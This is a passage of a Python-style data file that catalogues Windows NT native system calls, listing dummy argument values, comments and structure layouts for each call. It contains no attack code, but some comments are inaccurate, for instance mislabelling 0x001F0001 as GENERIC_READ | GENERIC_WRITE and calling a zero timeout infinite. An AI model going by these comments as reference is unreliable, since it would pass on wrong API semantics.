"pointedValue": None }, { "value": "0x00000000", "additionalComment": "StartParameter (None, no parameter passed)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to StartRoutine (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00401000" }, { "value": "0x00000444", "additionalComment": "WorkerProcessHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000555", "additionalComment": "CompletionPortHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct35", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "DesiredAccess (WORKER_FACTORY_ALL_ACCESS, typical value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to HANDLE WorkerFactoryHandleReturn (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct35": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None (no name)" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtFlushInstallUILanguage": { "ntFunc": "NtFlushInstallUILanguage", "pushes": [ { "value": "0x00000001", "additionalComment": "SetComittedFlag (TRUE, commit the language)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000409", "additionalComment": "InstallUILanguage (LANGID for en-US)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtGetMUIRegistryInfo": { "ntFunc": "NtGetMUIRegistryInfo", "pushes": [ { "value": "0xbadd0030", "additionalComment": "Pointer to Data buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0xbadd0040" }, { "value": "0xbadd0040", "additionalComment": "Pointer to ULONG DataSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000100" }, { "value": "0x00000000", "additionalComment": "Flags (0, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtGetNlsSectionPtr": { "ntFunc": "NtGetNlsSectionPtr", "pushes": [ { "value": "0xbadd0050", "additionalComment": "Pointer to ULONG SectionSize (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00008000" }, { "value": "0xbadd0060", "additionalComment": "Pointer to SectionPointer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00500000" }, { "value": "0x00000000", "additionalComment": "ContextData (None, not used)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "SectionData (example: 1, could be code page identifier)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000002", "additionalComment": "SectionType (example: 2, could be NLS section type)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtIsUILanguageComitted": { "ntFunc": "NtIsUILanguageComitted", "pushes": [], "structures": {} }, "NtReleaseCMFViewOwnership": { "ntFunc": "NtReleaseCMFViewOwnership", "pushes": [], "structures": {} }, "NtReleaseWorkerFactoryWorker": { "ntFunc": "NtReleaseWorkerFactoryWorker", "pushes": [ { "value": "0x00000000", "additionalComment": "HANDLE WorkerFactoryHandle (None, typical for test or error path)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtQueryInformationWorkerFactory": { "ntFunc": "NtQueryInformationWorkerFactory", "pushes": [ { "value": "0x00000000", "additionalComment": "Pointer to ULONG ReturnLength (None, optional out parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000020", "additionalComment": "ULONG WorkerFactoryInformationLength (32 bytes, typical for info query)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "Pointer to WorkerFactoryInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "WORKERFACTORYINFOCLASS WorkerFactoryInformationClass (e.g., WorkerFactoryBasicInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE WorkerFactoryHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetInformationWorkerFactory": { "ntFunc": "NtSetInformationWorkerFactory", "pushes": [ { "value": "0x00000010", "additionalComment": "ULONG WorkerFactoryInformationLength (16 bytes, typical for set info)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to WorkerFactoryInformation buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000002", "additionalComment": "WORKERFACTORYINFOCLASS WorkerFactoryInformationClass (e.g., WorkerFactoryReconfigureInformation)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE WorkerFactoryHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtWaitForWorkViaWorkerFactory": { "ntFunc": "NtWaitForWorkViaWorkerFactory", "pushes": [ { "value": "0xbadd0020", "additionalComment": "Pointer to FILE_IO_COMPLETION_INFORMATION MiniPacket (dummy pointer)", "structurePointer": "FILE_IO_COMPLETION_INFORMATION", "structureRef": "struct36", "structureValueExpectations": "Contains information about the I/O completion packet.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE WorkerFactoryHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct36": { "type": "FILE_IO_COMPLETION_INFORMATION", "fields": [ { "fieldName": "KeyContext", "fieldType": "PVOID", "fieldValue": "0xdeadbeef", "fieldComment": "Dummy key context value" }, { "fieldName": "ApcContext", "fieldType": "PVOID", "fieldValue": "0xabadcafe", "fieldComment": "Dummy APC context value" }, { "fieldName": "IoStatusBlock", "fieldType": "PIO_STATUS_BLOCK", "fieldValue": "0xbadd0030", "fieldComment": "Pointer to IO_STATUS_BLOCK (dummy pointer)" } ] } } }, "NtShutdownWorkerFactory": { "ntFunc": "NtShutdownWorkerFactory", "pushes": [ { "value": "0x00000005", "additionalComment": "LONG PendingWorkerCount (example: 5 workers pending)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000DEAD", "additionalComment": "HANDLE WorkerFactoryHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetTimerEx": { "ntFunc": "NtSetTimerEx", "pushes": [ { "value": "0x00000010", "additionalComment": "ULONG TimerSetInformationLength (example: 16 bytes)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "PVOID TimerSetInformation (dummy pointer, typically points to a structure or buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000001", "additionalComment": "TIMER_SET_INFORMATION_CLASS TimerSetInformationClass (example: TimerSetCoalescableTimer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000BEEF", "additionalComment": "HANDLE TimerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCancelTimer2": { "ntFunc": "NtCancelTimer2", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Optional PBOOLEAN (dummy pointer, can be None)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x0000BEEF", "additionalComment": "HANDLE TimerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtSetTimer2": { "ntFunc": "NtSetTimer2", "pushes": [ { "value": "0xbadd0020", "additionalComment": "PT2_SET_PARAMETERS Parameters (dummy pointer, typically points to a structure)", "structurePointer": "T2_SET_PARAMETERS", "structureRef": "struct37", "structureValueExpectations": "Timer configuration parameters such as tolerable delay, flags, etc.", "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "PLARGE_INTEGER Period (dummy pointer, typically points to a 64-bit interval)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct38", "structureValueExpectations": "Interval in 100-nanosecond units for periodic timer.", "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "PLARGE_INTEGER DueTime (dummy pointer, typically points to a 64-bit time value)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct39", "structureValueExpectations": "Absolute or relative time when the timer is set.", "pointedValue": None }, { "value": "0x0000BEEF", "additionalComment": "HANDLE TimerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct37": { "type": "T2_SET_PARAMETERS", "fields": [ { "fieldName": "TolerableDelay", "fieldType": "ULONG", "fieldValue": "0x00000064", "fieldComment": "100 ms tolerable delay" }, { "fieldName": "Flags", "fieldType": "ULONG", "fieldValue": "0x00000001", "fieldComment": "Example: T2_SET_PARAMETERS_FLAG_NO_WAKE" } ] }, "struct38": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000002710", "fieldComment": "Period: 10,000 (1 ms in 100-ns units)" } ] }, "struct39": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0xFFFFFFFFFFDCD650", "fieldComment": "DueTime: -2,000,000 (relative, 200 ms in 100-ns units)" } ] } } }, "NtQueryWnfStateData": { "ntFunc": "NtQueryWnfStateData", "pushes": [ { "value": "0xbadd0050", "additionalComment": "PULONG BufferSize (dummy pointer, receives size of data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000100" }, { "value": "0xbadd0060", "additionalComment": "PVOID Buffer (dummy pointer, receives state data)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0xbadd0070", "additionalComment": "PWNF_CHANGE_STAMP ChangeStamp (dummy pointer, receives change stamp)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000010" }, { "value": "0x00000000", "additionalComment": "PVOID ExplicitScope (None, typical usage)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PCWNF_TYPE_ID TypeId (None, typical usage)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x41C64E6D", "additionalComment": "PCWNF_STATE_NAME StateName (example: random state name value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtUpdateWnfStateData": { "ntFunc": "NtUpdateWnfStateData", "pushes": [ { "value": "0x00000000", "additionalComment": "LOGICAL CheckStamp (FALSE, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "WNF_CHANGE_STAMP MatchingChangeStamp (default, not used)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID ExplicitScope (None, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PCWNF_TYPE_ID TypeId (None, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG Length (0, default, no buffer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PVOID Buffer (None, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "PCWNF_STATE_NAME StateName (None, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtDisableLastKnownGood": { "ntFunc": "NtDisableLastKnownGood", "pushes": [], "structures": {} }, "NtEnableLastKnownGood": { "ntFunc": "NtEnableLastKnownGood", "pushes": [], "structures": {} }, "NtCancelSynchronousIoFile": { "ntFunc": "NtCancelSynchronousIoFile", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct40", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "Pointer to IO_STATUS_BLOCK IoRequestToCancel (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct41", "structureValueExpectations": "Pointer to the I/O request to cancel.", "pointedValue": None }, { "value": "0x00000444", "additionalComment": "HANDLE ThreadHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct40": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "No additional information" } ] }, "struct41": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0xC0000120", "fieldComment": "STATUS_CANCELLED" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "No additional information" } ] } } }, "NtSetIoCompletion": { "ntFunc": "NtSetIoCompletion", "pushes": [ { "value": "0x00001000", "additionalComment": "ULONG NumberOfBytesTransfered (4096 bytes, typical I/O size)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "NTSTATUS CompletionStatus (STATUS_SUCCESS)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to IO_STATUS_BLOCK IoStatusBlock (dummy pointer)", "structurePointer": "IO_STATUS_BLOCK", "structureRef": "struct42", "structureValueExpectations": "Status and information fields for I/O completion.", "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG CompletionKey (arbitrary key, 1)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000445", "additionalComment": "HANDLE IoCompletionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct42": { "type": "IO_STATUS_BLOCK", "fields": [ { "fieldName": "Status", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS" }, { "fieldName": "Information", "fieldType": "ULONG_PTR", "fieldValue": "0x00001000", "fieldComment": "4096 bytes transferred" } ] } } }, "NtSetIoCompletionEx": { "ntFunc": "NtSetIoCompletionEx", "pushes": [ { "value": "0x00000000", "additionalComment": "IoStatusInformation (no information, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "IoStatus (STATUS_SUCCESS, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "CompletionValue (None, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "CompletionKey (example key value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0000", "additionalComment": "IoCompletionReserveHandle (dummy handle, usually None or reserved)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0010", "additionalComment": "IoCompletionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtRemoveIoCompletionEx": { "ntFunc": "NtRemoveIoCompletionEx", "pushes": [ { "value": "0x00", "additionalComment": "Alertable (FALSE, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to LARGE_INTEGER Timeout (dummy pointer, usually None for infinite)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct43", "structureValueExpectations": "Timeout interval in 100-nanosecond units, negative for relative.", "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to ULONG NumEntriesRemoved (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000001" }, { "value": "0x00000010", "additionalComment": "Count (16 entries to remove, example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0040", "additionalComment": "Pointer to FILE_IO_COMPLETION_INFORMATION array (dummy pointer)", "structurePointer": "FILE_IO_COMPLETION_INFORMATION", "structureRef": "struct44", "structureValueExpectations": "Array of FILE_IO_COMPLETION_INFORMATION structures.", "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "IoCompletionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct43": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "Infinite timeout (None pointer means wait forever)" } ] }, "struct44": { "type": "FILE_IO_COMPLETION_INFORMATION", "fields": [ { "fieldName": "CompletionKey", "fieldType": "ULONG_PTR", "fieldValue": "0x00000001", "fieldComment": "Example completion key" }, { "fieldName": "CompletionValue", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None, example value" }, { "fieldName": "IoStatus", "fieldType": "NTSTATUS", "fieldValue": "0x00000000", "fieldComment": "STATUS_SUCCESS" }, { "fieldName": "IoStatusInformation", "fieldType": "ULONG_PTR", "fieldValue": "0x00000000", "fieldComment": "No additional information" } ] } } }, "NtNotifyChangeSession": { "ntFunc": "NtNotifyChangeSession", "pushes": [ { "value": "0x00001000", "additionalComment": "BufferSize (4096 bytes, example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to Buffer (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" }, { "value": "0x00000002", "additionalComment": "IoState2 (IO_SESSION_STATE, example value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "IoState (IO_SESSION_STATE, example value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000010", "additionalComment": "Action (example action value)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "Reserved (None, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000005", "additionalComment": "IoStateSequence (example sequence number)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "SessionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtAssociateWaitCompletionPacket": { "ntFunc": "NtAssociateWaitCompletionPacket", "pushes": [ { "value": "0xbadd0080", "additionalComment": "Pointer to BOOLEAN (dummy pointer, optional parameter)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00" }, { "value": "0x00000000", "additionalComment": "IoStatusInformation (default, no information)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", "additionalComment": "IoStatus (STATUS_SUCCESS, default)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0090", "additionalComment": "ApcContext (dummy pointer, user context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x12345678" }, { "value": "0xbadd00a0", "additionalComment": "KeyContext (dummy pointer, user key context)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x87654321" }, { "value": "0xbadd00b0", "additionalComment": "TargetObjectHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00c0", "additionalComment": "IoCompletionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd00d0", "additionalComment": "WaitCompletionPacketHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtFlushProcessWriteBuffers": { "ntFunc": "NtFlushProcessWriteBuffers", "pushes": [], "structures": {} }, "NtCommitComplete": { "ntFunc": "NtCommitComplete", "pushes": [ { "value": "0xbadd0000", "additionalComment": "Pointer to LARGE_INTEGER TmVirtualClock (dummy pointer, commonly None)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct45", "structureValueExpectations": "Optional virtual clock value; often None.", "pointedValue": None }, { "value": "0x0000abcd", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct45": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "None/zero, commonly used for optional TmVirtualClock" } ] } } }, "NtCommitEnlistment": { "ntFunc": "NtCommitEnlistment", "pushes": [ { "value": "0xbadd0010", "additionalComment": "Pointer to LARGE_INTEGER TmVirtualClock (dummy pointer, commonly None)", "structurePointer": "LARGE_INTEGER", "structureRef": "struct46", "structureValueExpectations": "Optional virtual clock value; often None.", "pointedValue": None }, { "value": "0x0000bcde", "additionalComment": "HANDLE EnlistmentHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": { "struct46": { "type": "LARGE_INTEGER", "fields": [ { "fieldName": "QuadPart", "fieldType": "LONGLONG", "fieldValue": "0x0000000000000000", "fieldComment": "None/zero, commonly used for optional TmVirtualClock" } ] } } }, "NtCommitTransaction": { "ntFunc": "NtCommitTransaction", "pushes": [ { "value": "0x00000001", "additionalComment": "BOOLEAN Wait (TRUE)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000cdef", "additionalComment": "HANDLE TransactionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None } ], "structures": {} }, "NtCreateEnlistment": { "ntFunc": "NtCreateEnlistment", "pushes": [ { "value": "0x00000000", "additionalComment": "PVOID EnlistmentKey (None, optional context pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000000F", "additionalComment": "NOTIFICATION_MASK NotificationMask (example mask)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000001", "additionalComment": "ULONG CreateOptions (ENLISTMENT_SUPERIOR, example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0020", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct47", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0x0000def0", "additionalComment": "HANDLE TransactionHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x0000ef01", "additionalComment": "HANDLE ResourceManagerHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE, example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0030", "additionalComment": "Pointer to HANDLE EnlistmentHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct47": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] } } }, "NtCreateResourceManager": { "ntFunc": "NtCreateResourceManager", "pushes": [ { "value": "0xbadd0040", "additionalComment": "Pointer to UNICODE_STRING Description (dummy pointer, commonly None)", "structurePointer": "UNICODE_STRING", "structureRef": "struct48", "structureValueExpectations": "Optional description string for the resource manager.", "pointedValue": None }, { "value": "0x00000000", "additionalComment": "ULONG CreateOptions (default 0)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0050", "additionalComment": "Pointer to OBJECT_ATTRIBUTES (dummy pointer, commonly None)", "structurePointer": "OBJECT_ATTRIBUTES", "structureRef": "struct49", "structureValueExpectations": "Length/size field; optional root directory handle; optional UNICODE_STRING object name pointer; attribute flags; optional security descriptor pointer; optional security quality of service pointer.", "pointedValue": None }, { "value": "0xbadd0060", "additionalComment": "Pointer to GUID RmGuid (dummy pointer)", "structurePointer": "GUID", "structureRef": "struct50", "structureValueExpectations": "Globally unique identifier for the resource manager.", "pointedValue": None }, { "value": "0x0000f012", "additionalComment": "HANDLE TmHandle (dummy handle)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x001F0001", "additionalComment": "ACCESS_MASK DesiredAccess (GENERIC_READ | GENERIC_WRITE, example)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0xbadd0070", "additionalComment": "Pointer to HANDLE ResourceManagerHandle (dummy pointer)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": "0x00000000" } ], "structures": { "struct48": { "type": "UNICODE_STRING", "fields": [ { "fieldName": "Length", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Zero length (no description)" }, { "fieldName": "MaximumLength", "fieldType": "USHORT", "fieldValue": "0x0000", "fieldComment": "Zero maximum length" }, { "fieldName": "Buffer", "fieldType": "PWSTR", "fieldValue": "0x00000000", "fieldComment": "None buffer" } ] }, "struct49": { "type": "OBJECT_ATTRIBUTES", "fields": [ { "fieldName": "Length", "fieldType": "ULONG", "fieldValue": "0x00000030", "fieldComment": "Size of OBJECT_ATTRIBUTES" }, { "fieldName": "RootDirectory", "fieldType": "HANDLE", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "ObjectName", "fieldType": "PUNICODE_STRING", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "Attributes", "fieldType": "ULONG", "fieldValue": "0x00000040", "fieldComment": "OBJ_CASE_INSENSITIVE" }, { "fieldName": "SecurityDescriptor", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" }, { "fieldName": "SecurityQualityOfService", "fieldType": "PVOID", "fieldValue": "0x00000000", "fieldComment": "None" } ] }, "struct50": { "type": "GUID", "fields": [ { "fieldName": "Data1", "fieldType": "ULONG", "fieldValue": "0x12345678", "fieldComment": "Example GUID part" }, { "fieldName": "Data2", "fieldType": "USHORT", "fieldValue": "0x9abc", "fieldComment": "Example GUID part" }, { "fieldName": "Data3", "fieldType": "USHORT", "fieldValue": "0xdef0", "fieldComment": "Example GUID part" }, { "fieldName": "Data4", "fieldType": "UCHAR[8]", "fieldValue": "0x1122334455667788", "fieldComment": "Example GUID part" } ] } } }, "NtCreateTransaction": { "ntFunc": "NtCreateTransaction", "pushes": [ { "value": "0x00000000", "additionalComment": "None (no description)", "structurePointer": None, "structureRef": None, "structureValueExpectations": None, "pointedValue": None }, { "value": "0x00000000", 